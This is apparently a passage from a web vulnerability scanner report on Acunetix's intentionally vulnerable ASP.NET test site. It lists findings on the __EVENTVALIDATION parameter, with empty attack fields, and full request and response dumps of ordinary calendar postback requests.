purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8368&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECYqJzR2ghkZGTJotax30JaJ28kn1iz0znQALIbyg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL26oXQDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBP1Yrr1TmZQqnKLQtmeNI%2Bm8Hb%2BC
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:02 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECYqJzR2ghkZGTJotax30JaJ28kn1iz0znQALIbyg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL26oXQDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBP1Yrr1TmZQqnKLQtmeNI+m8Hb+C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:White" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8252&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBArXB1dtoIZGRkjqZuSdovdiyPku0om8TBnHy%2FohE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL2lLbtCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DxKq%2BG95BR4NnLSJsslFqeUtX%2FHs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:57 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBArXB1dtoIZGRkjqZuSdovdiyPku0om8TBnHy/ohE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL2lLbtCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DxKq+G95BR4NnLSJsslFqeUtX/Hs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:White" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
